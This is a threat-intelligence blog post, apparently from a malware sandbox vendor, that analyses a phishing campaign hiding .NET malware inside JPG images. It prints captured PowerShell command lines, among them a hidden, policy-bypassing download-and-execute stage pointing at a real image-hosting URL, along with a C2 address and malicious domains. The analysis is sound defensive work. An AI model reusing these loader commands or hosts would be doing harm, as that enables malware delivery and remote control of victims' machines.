{"id":6047,"date":"2023-10-24T05:34:04","date_gmt":"2023-10-24T05:34:04","guid":{"rendered":"\/cybersecurity-blog\/?p=6047"},"modified":"2023-12-01T07:48:11","modified_gmt":"2023-12-01T07:48:11","slug":"steganography-in-malware-attacks","status":"publish","type":"post","link":"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/","title":{"rendered":"Unpacking the Use of Steganography in Recent Malware Attacks"},"content":{"rendered":"\n<p><strong>UPD:<\/strong> The section &#8220;Additional tasks&#8221; has been updated to include a new November 2023 steganography campaign.<\/p>\n\n\n\n<p>Malware delivery techniques are always evolving to bypass security measures. Gone are the days when a scammer could simply send an executable file as an email attachment \u2014 today, it simply won&#8217;t get past email filters.\u00a0<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Threat actors are experimenting with evasion techniques&nbsp;<\/h2>\n\n\n\n<p>To evade detection by automatic analysis tools, attackers are adding layers of complexity. We&#8217;ve seen passwords on archives, captchas, and even QR codes integrated into recent attacks \u2014 we covered them in detail in a <a href=\"https:\/\/any.run\/cybersecurity-blog\/new-phishing-tactics\/\" target=\"_blank\" rel=\"noreferrer noopener\">previous article<\/a>.&nbsp;<\/p>\n\n\n\n<p>Attackers also vary the types of files they use as attachments. They opt for <strong>lnk<\/strong> files, <strong>img <\/strong>or <strong>iso <\/strong>image files, among others, to deceive security systems. Multiple techniques are often used in conjunction to increase the chances of a successful breach.&nbsp;<\/p>\n\n\n\n<p>Today, we want to highlight a resurgence in the use of steganography, a method that embeds malicious code within a benign file or image.&nbsp;&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">What is steganography?&nbsp;<\/h2>\n\n\n\n<p>Steganography hides data within another file or medium, effectively making it invisible. Unlike encryption, which scrambles but clearly marks data as confidential, steganography camouflages the data, blending it in with its surroundings.&nbsp;<\/p>\n\n\n\n<p>This can be used to evade security defenses. Malicious code may be embed in image files or even network traffic, aiming to make it indistinguishable from regular, benign data. This way, the hidden malware is less likely to trigger security alerts.&nbsp;&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Steganography is gaining traction<\/h3>\n\n\n\n<p>Steganography has been around for a while, but it hasn&#8217;t been a go-to method for attackers. The main reason is that simpler payload delivery techniques have been effective enough. However, recently we&#8217;ve noticing an uptick in the use of steganography in cyber attacks.&nbsp;<\/p>\n\n\n\n<p>To better understand how this technique is being deployed, let&#8217;s walk through an example and demonstrate how to detect hidden data using <a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=stegomalware&amp;utm_content=landing&amp;utm_term=241023\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN<\/a>.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"525\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/phishing-1024x525.png\" alt=\"\" class=\"wp-image-6049\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/phishing-1024x525.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/phishing-300x154.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/phishing-768x394.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/phishing-370x190.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/phishing-270x139.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/phishing-585x300.png 585w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/phishing-740x380.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/phishing.png 1370w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">A breakdown of how this phishing campaign usually works<\/figcaption><\/figure><\/div>\n\n\n<h2 class=\"wp-block-heading\">Breaking down a steganography campaign&nbsp;<\/h2>\n\n\n\n<p>We&#8217;ll use <a href=\"https:\/\/app.any.run\/tasks\/9deec296-da80-4742-b491-0cce95066735\/?utm_source=anyrunblog&amp;utm_medium=article_bottom&amp;utm_campaign=stegomalware&amp;utm_content=task&amp;utm_term=241023\" target=\"_blank\" rel=\"noreferrer noopener\">this task<\/a> in ANY.RUN to walk through how this campaign operates. Keep in mind that attack strategies in this campaign can vary. At each stage of the attack chain, we&#8217;ll point out where the tactics might deviate from our example.<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\nFollow along by creating <span class=\"highlight\">a free account<\/span> in ANY.RUN&nbsp;\n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/app.any.run\/#register\" rel=\"noopener\" target=\"_blank\">\nSign up now\u00a0\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<h3 class=\"wp-block-heading\">Initial infection vector<\/h3>\n\n\n\n<p>In the initial stage, we encounter various phishing tactics that employ different types of bait. Usually, the user gets a phishing email that either has an attachment containing a malicious document or a link to download a payload. These tactics align with <strong>MITRE ATT&amp;CK techniques Spearphishing Attachment (T1566.001)<\/strong> or <strong>Spearphishing Link (T1566.002)<\/strong>.&nbsp;<\/p>\n\n\n\n<p>In our specific example, the phishing email poses as a Colombian government organization. Take note of the archive password &#8220;0410&#8221; mentioned in the email \u2014 it will come into play later.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"651\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/email-1024x651.png\" alt=\"\" class=\"wp-image-6050\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/email-1024x651.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/email-300x191.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/email-768x488.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/email-370x235.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/email-270x172.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/email-740x470.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/email.png 1223w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">This email was the initial delivery method in our task<\/figcaption><\/figure><\/div>\n\n\n<h3 class=\"wp-block-heading\">Payload delivery&nbsp;<\/h3>\n\n\n\n<p>The next step varies based on the initial attack vector. If it&#8217;s a malicious attachment, the exploit <strong>CVE-2017-11882 <\/strong>is leveraged to download the payload. If it&#8217;s a link, the user downloads an archive containing malicious content and executes it, triggering the payload download. This maps to <strong>MITRE ATT&amp;CK technique Exploitation for Client Execution (T1203)<\/strong>.&nbsp;<\/p>\n\n\n\n<p>In our example, clicking the link in the email redirects to ydray[.]com, where an archive is downloaded. To open it, we use the password &#8220;0410&#8221; provided in the email. Inside, we find a VBS file with a long, deceptive file name. When a malicious document is used, the VBS file is downloaded and executed automatically through the <strong>CVE-2017-11882 <\/strong>exploit, requiring the user only to open the Microsoft Office file.&nbsp;<\/p>\n\n\n\n<p>The VBS script is responsible for fetching the next stage of the attack. It is executed using wscript, aligning with the <strong>MITRE ATT&amp;CK technique Command and Scripting Interpreter: Visual Basic (T1059.005)<\/strong>.&nbsp;<\/p>\n\n\n\n<p>In addition, the VBS script is heavily obfuscated \u2014 and it is bloated to around 350-400 KB with junk data to make analysis challenging.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"622\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static-1-1024x622.png\" alt=\"\" class=\"wp-image-6051\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static-1-1024x622.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static-1-300x182.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static-1-768x467.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static-1-370x225.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static-1-270x164.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static-1-740x450.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static-1.png 1043w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Content of the VBS file<\/figcaption><\/figure><\/div>\n\n\n<h2 class=\"wp-block-heading\">Deobfuscating the VBS file&nbsp;<\/h2>\n\n\n\n<p>Deobfuscating the VBS script manually would be time-consuming, but that&#8217;s where an interactive sandbox like ANY.RUN comes in handy. We&#8217;ll execute the script and observe its behavior through dynamic analysis.<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\nSpeed up incident investigation with <span class=\"highlight\"> interactive sandboxing<\/span> in ANY.RUN&nbsp;\n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/app.any.run\/#register\" rel=\"noopener\" target=\"_blank\">\nGet started free\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<p>To simplify the task, we&#8217;ll focus on the command line of its child PowerShell process. Specifically, we&#8217;ll examine the process with PID 3540. Here&#8217;s a snippet of what we see in the task:<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-33\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"1\"\n           data-rows=\"1\"\n           data-wpID=\"33\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:100%;                    padding:10px;\n                    \"\n                    >\n                                        \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -command \"$Codigo = 'JDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVQByDgTreGwDgTreIDgTreDgTre9DgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBw\/....cut a lot  here \u2026.\/eDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreVwBpDgTreG4DgTreZDgTreBvDgTreHcDgTrecwBcDgTreFQDgTreZQBtDgTreHDgTreDgTreXDgTreDgTrenDgTreCwDgTreIDgTreDgTrenDgTreEkDgTreZwBmDgTreHgDgTreJwDgTrepDgTreCkDgTre'\";$OWjuxd = [system.Text.encoding]::Unicode.GetString(\"[system.Convert]::Frombase64string( $codigo.replace('DgTre','A') ))\";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD\"\"                    <\/th>\n                                        <\/tr>\n                <\/tbody>    <\/table>\n<\/div><style id='wpdt-custom-style-33'>\ntable#wpdtSimpleTable-33{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-33 td, table.wpdtSimpleTable33 th { white-space: normal !important; }\n<\/style>\n\n\n\n\n<p>At this point, the situation becomes pretty clear. The PowerShell command includes obfuscation and flags for stealthy execution, indicating malicious intent. While you could decode the observed actions using a tool like <a href=\"https:\/\/gchq.github.io\/CyberChef\/#recipe=Find_\/_Replace(%7B'option':'Simple%20string','string':'DgTre'%7D,'A',true,false,true,false)From_Base64('A-Za-z0-9%2B\/%3D',true,false)Decode_text('UTF-16LE%20(1200)')\" target=\"_blank\" rel=\"noreferrer noopener\">CyberChef<\/a>, the red flags are strong enough to suggest it&#8217;s easier just to move on to the next process in the chain. Let&#8217;s examine the command line of the subsequent process with PID 4060.<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-34\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"1\"\n           data-rows=\"1\"\n           data-wpID=\"34\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:100%;                    padding:10px;\n                    \"\n                    >\n                                        \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -executionpolicy bypass -NoProfile -command \"$imageUrl = 'https:\/\/uploaddeimagens.com.br\/images\/004\/616\/609\/original\/rump_vbs.jpg?1695408937';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('0\/4i1mo\/d\/ee.etsap\/\/:sptth' , '' , '2' , 'Igfx' , '1' , 'C:\\Windows\\Temp\\', 'Igfx'))\"                    <\/th>\n                                        <\/tr>\n                <\/tbody>    <\/table>\n<\/div><style id='wpdt-custom-style-34'>\ntable#wpdtSimpleTable-34{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-34 td, table.wpdtSimpleTable34 th { white-space: normal !important; }\n<\/style>\n\n\n\n\n<p>From the cmd output, it&#8217;s evident that PowerShell downloads a file from the uploaddeimagens resource. It then extracts information between the &lt;&lt;BASE64_START&gt;&gt; and &lt;&lt;BASE64_END&gt;&gt; flags. Additionally, an Igfx.lnk file is created and placed in the startup directory. The command line of this file reveals that upon OS reboot, a PowerShell process will execute the Igfx.vbs file from the Temp directory, running it in a hidden window. This gives us key insights into the malware&#8217;s persistence mechanism.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"621\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static2-1024x621.png\" alt=\"\" class=\"wp-image-6052\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static2-1024x621.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static2-300x182.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static2-768x466.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static2-370x224.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static2-270x164.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static2-740x449.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static2.png 1044w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">lgfx.lnk as seen with ANY.RUN\u2019s static discovering<\/figcaption><\/figure><\/div>\n\n\n<p>Following this, the extracted information is decoded from base64. An assembly is then loaded from the converted byte array and executed.&nbsp;<\/p>\n\n\n\n<p>Turning our attention to the image file, a static analysis initially reveals what appears to be a legitimate image. However, upon inspecting the HEX tab and scrolling down, we find the &lt;&lt;BASE64_START&gt;&gt; flag, previously seen in the PowerShell cmd. Right after this flag, we see the text &#8220;TVq,&#8221; which is the base64 encoded MZ signature for executable files. This confirms the use of steganography to hide malicious code within the image.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"726\" height=\"385\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/binary.png\" alt=\"\" class=\"wp-image-6053\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/binary.png 726w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/binary-300x159.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/binary-370x196.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/binary-270x143.png 270w\" sizes=\"(max-width: 726px) 100vw, 726px\" \/><figcaption class=\"wp-element-caption\">&lt;&lt;BASE64_START&gt;&gt; flag hidden in the image<\/figcaption><\/figure><\/div>\n\n\n<h2 class=\"wp-block-heading\">Extracting the payload in CyberChef<\/h2>\n\n\n\n<p>The script from the VBS file we\u2019ve looked at above triggers PowerShell to download an image file. This image contains a base64 encoded executable, aligning with MITRE ATT&amp;CK technique Obfuscated Files or Information: <strong>Command Obfuscation (T1027.010)<\/strong>. PowerShell then extracts and executes the hidden executable, fulfilling the criteria for Obfuscated Files or Information: <strong>Steganography (T1027.003)<\/strong>.&nbsp;<\/p>\n\n\n\n<p>To make payload extraction easier, we&#8217;ve created a universal recipe in CyberChef. This allows you to extract and decode hidden payloads from images efficiently. Here&#8217;s how:&nbsp;<\/p>\n\n\n\n<p>1. While still in ANY.RUN, download the image by clicking on the <strong>Download <\/strong>button.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"623\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/image-11-1024x623.png\" alt=\"\" class=\"wp-image-6054\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/image-11-1024x623.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/image-11-300x183.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/image-11-768x467.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/image-11-1536x935.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/image-11-2048x1246.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/image-11-370x225.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/image-11-270x164.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/image-11-740x450.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">You can easily download the image from ANY.RUN<\/figcaption><\/figure><\/div>\n\n\n<p>2. Follow the link to the recipe in <a href=\"https:\/\/gchq.github.io\/CyberChef\/#recipe=Unzip('infected',false)Find_\/_Replace(%7B'option':'Regex','string':'%5E.%2B%3C%3CBASE64_START%3E%3E'%7D,'',true,false,true,true)Find_\/_Replace(%7B'option':'Regex','string':'%3C%3CBASE64_END%3E%3E$'%7D,'',true,true,true,false)From_Base64('A-Za-z0-9%2B\/%3D',false,false)\" target=\"_blank\" rel=\"noreferrer noopener\">CyberChef<\/a>.&nbsp;&nbsp;<\/p>\n\n\n\n<p>3. Upload the file you downloaded in step 1 to CyberChef.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"397\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/upload-1024x397.png\" alt=\"\" class=\"wp-image-6056\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/upload-1024x397.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/upload-300x116.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/upload-768x298.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/upload-370x144.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/upload-270x105.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/upload-740x287.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/upload.png 1100w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Uploading the file to CyberChef<\/figcaption><\/figure><\/div>\n\n\n<p>4. Grab the payload that you&#8217;ve extracted from the image.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"384\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/save-1024x384.png\" alt=\"\" class=\"wp-image-6055\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/save-1024x384.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/save-300x112.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/save-768x288.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/save-370x139.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/save-270x101.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/save-740x277.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/save.png 1100w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Saving the extracted payload to a disk<\/figcaption><\/figure><\/div>\n\n\n<p>In the final stage, the malicious code is executed via proxy through Regasm. Among the tasks we&#8217;ve analyzed, we&#8217;ve encountered various payloads like AgentTesla, AsyncRAT, NjRAT, Dtloader, and Remcos.<\/p>\n\n\n\n<p>As of the end of October 2023, the campaign is ongoing.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Additional tasks &nbsp;<\/h2>\n\n\n\n<p>If you\u2019d like to review more tasks where adversaries deployed&nbsp;steganography, check out these samples in ANY.RUN:&nbsp;&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>First half of October 2023<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/app.any.run\/tasks\/6bf2be3f-aaba-466d-8b76-59af0bcd97ba\/?utm_source=anyrunblog&amp;utm_medium=article_bottom&amp;utm_campaign=stegomalware&amp;utm_content=task&amp;utm_term=241023\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/app.any.run\/tasks\/6bf2be3f-aaba-466d-8b76-59af0bcd97ba\/<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/app.any.run\/tasks\/de094198-967c-40d4-8b70-30b5fb7bfd43\/?utm_source=anyrunblog&amp;utm_medium=article_bottom&amp;utm_campaign=stegomalware&amp;utm_content=task&amp;utm_term=241023\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/app.any.run\/tasks\/de094198-967c-40d4-8b70-30b5fb7bfd43\/<\/a>&nbsp;<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Second half of October 2023 <\/strong>&nbsp;<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/app.any.run\/tasks\/4eeb5f1a-9e68-4f93-a639-342cc29654ea\/?utm_source=anyrunblog&amp;utm_medium=article_bottom&amp;utm_campaign=stegomalware&amp;utm_content=task&amp;utm_term=241023\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/app.any.run\/tasks\/4eeb5f1a-9e68-4f93-a639-342cc29654ea\/<\/a><\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>November 2023<\/strong><\/h3>\n\n\n\n<p>We\u2019ve spotted the use of steganography in a new campaign.&nbsp;&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/app.any.run\/tasks\/98c0082f-3a84-4557-9b3d-36a68790a872\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/app.any.run\/tasks\/98c0082f-3a84-4557-9b3d-36a68790a872\/<\/a><\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"800\" height=\"785\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2023\/12\/picturestego.png\" alt=\"\" class=\"wp-image-6397\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/12\/picturestego.png 800w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/12\/picturestego-300x294.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/12\/picturestego-768x754.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/12\/picturestego-70x70.png 70w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/12\/picturestego-370x363.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/12\/picturestego-270x265.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/12\/picturestego-740x726.png 740w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><\/figure><\/div>\n\n\n<p>Steganography is used in multiple stages:&nbsp;<\/p>\n\n\n\n<ol class=\"wp-block-list\" start=\"1\">\n<li>The modified &#8220;Google Update&#8221; app downloads multiple PE files and an image containing a DLL&nbsp;<\/li>\n<\/ol>\n\n\n\n<ol class=\"wp-block-list\" start=\"2\">\n<li>TrueUpdate, downloaded in the previous step, extracts and decrypts the DLL from the image file with 256 bytes XOR key and transfers control to the received DLL&nbsp;<\/li>\n<\/ol>\n\n\n\n<ol class=\"wp-block-list\" start=\"3\">\n<li>Then a malicious module comes into play, hosting a Remote Access Trojan and intercepting control. The actions of #gh0strat become evident on the network at the specified address\ufe0f 112.213.101.146:7700&nbsp;<\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">Wrapping up&nbsp;<\/h2>\n\n\n\n<p>Steganography, once seen as too complex for regular deployment, is possibly being revived as a wide-spread malware delivery mechanism. It&#8217;s not just tricky to implement \u2014 it&#8217;s also difficult to detect.&nbsp;<\/p>\n\n\n\n<p>But as the analysis above showed, using dynamic analysis in ANY.RUN, along with <a href=\"https:\/\/any.run\/cybersecurity-blog\/static-discovery-update\/\" target=\"_blank\" rel=\"noreferrer noopener\">Static discovering<\/a> and CyberChef for payload extraction, can significantly reduce the manual work required for incident analysis or investigation.&nbsp;<\/p>\n\n\n\n<p><strong>Are you interested in trying the full range of ANY.RUN capabilities?<\/strong> Simply request a trial today.&nbsp; Request a trial today and enjoy 14 days of free access to our Enterprise 